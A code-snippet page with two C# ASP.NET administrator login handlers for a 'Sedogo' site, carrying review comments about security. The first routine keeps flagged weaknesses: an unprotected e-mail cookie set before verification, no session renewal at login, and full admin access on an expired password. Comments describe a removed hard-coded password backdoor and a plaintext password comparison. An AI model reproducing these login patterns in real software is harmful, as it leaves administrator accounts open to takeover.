Esempio n. 1
    //===============================================================
    // Function: loginButton_Click
    //===============================================================
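    /// <summary>
    /// Handles the administrator login form: verifies the submitted e-mail address and
    /// password through <c>Administrator.VerifyLogin</c> and, on success (or an expired
    /// password), populates the session, issues the forms-authentication cookie and
    /// redirects to the admin main page. On <c>loginFailed</c> a client-side alert is shown.
    /// </summary>
    /// <param name="sender">Control that raised the click event (unused).</param>
    /// <param name="e">Event data (unused).</param>
    public void loginButton_Click(object sender, EventArgs e)
    {
        string loginEmailAddress = emailAddress.Text;
        string loginPassword = userPassword.Text;

        // Remember the submitted e-mail address in a cookie that expires in 1 year.
        // NOTE(review): the cookie is written before the credentials are verified, so it
        // stores whatever was typed into the form. If no client script reads it, consider
        // setting cookie.HttpOnly (and cookie.Secure on HTTPS-only deployments) - confirm.
        HttpCookie cookie = new HttpCookie("SedogoAdministratorEmailAddress");
        cookie.Value = loginEmailAddress;
        cookie.Expires = DateTime.Now.AddYears(1);
        Response.Cookies.Add(cookie);

        Administrator adminUser = new Administrator("");
        loginResults checkResult = adminUser.VerifyLogin(loginEmailAddress, loginPassword, false, true, "default.aspx");

        // SECURITY: an earlier revision overrode checkResult with loginSuccess whenever the
        // submitted password matched a hard-coded string, for any e-mail address. That bypass
        // has been removed; VerifyLogin is the only authority on the login outcome. The old
        // literal lives in source history and in deployed binaries, so treat it as disclosed:
        // make sure no account uses it and review past administrator logins.

        // NOTE(review): passwordExpired is treated exactly like loginSuccess here and yields a
        // full administrator session; confirm the admin pages force a password change.
        if ((checkResult == loginResults.loginSuccess) || (checkResult == loginResults.passwordExpired))
        {
            // NOTE(review): values are added to the existing session; no new session
            // identifier is issued at login in this method.
            Session.Add("loggedInAdministratorID", adminUser.administratorID);
            Session.Add("loggedInAdministratorName", adminUser.administratorName);
            Session.Add("loggedInAdministratorEmailAddress", adminUser.emailAddress);

            // Non-persistent forms-authentication ticket (second argument is false).
            FormsAuthentication.SetAuthCookie(loginEmailAddress, false);

            Session.Add("SuperUserID", adminUser.administratorID);

            Response.Redirect("~/admin/main.aspx");
        }

        if (checkResult == loginResults.loginFailed)
        {
            // Same message for an unknown account and a wrong password.
            Page.ClientScript.RegisterStartupScript(this.GetType(), "Alert", "alert(\"Username or password is not correct\");", true);
        }
    }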
Esempio n. 2
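        /// <summary>
        /// Checks an administrator's credentials by delegating to Administrator.VerifyLogin.
        /// </summary>
        /// <param name="emailAddress">administrator's email address, used as the login name</param>
        /// <param name="password">password submitted by the caller</param>
        /// <param name="db">database access object (not used by the current implementation)</param>
        /// <param name="adminId">output - admin id; null when authentication fails</param>
        /// <param name="fullName">output - admin's name; null when authentication fails</param>
        /// <returns>true if authentication is successful; otherwise false</returns>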
        public static bool VerifyAdminLogin(string emailAddress, string password, SedogoDBEntities db, out int? adminId,
            out string fullName)
        {
            // Outputs stay null unless the login succeeds.
            adminId = null;
            fullName = null;

            // The check is delegated to Administrator.VerifyLogin; 'db' is not used here.
            var administrator = new Administrator("");
            var outcome = administrator.VerifyLogin(emailAddress, password, false, true, "API. VerifyAdminLogin");

            // Only loginSuccess counts as authenticated; every other result returns false.
            if (outcome != loginResults.loginSuccess)
            {
                return false;
            }

            adminId = administrator.administratorID;
            fullName = administrator.administratorName;
            return true;

            // A superseded, commented-out implementation used to follow here: it called
            // db.spVerifyAdministratorLogin(emailAddress) and compared the returned
            // AdministratorPassword to the submitted password with ==. It is kept in
            // version history only and should not be reinstated.
        }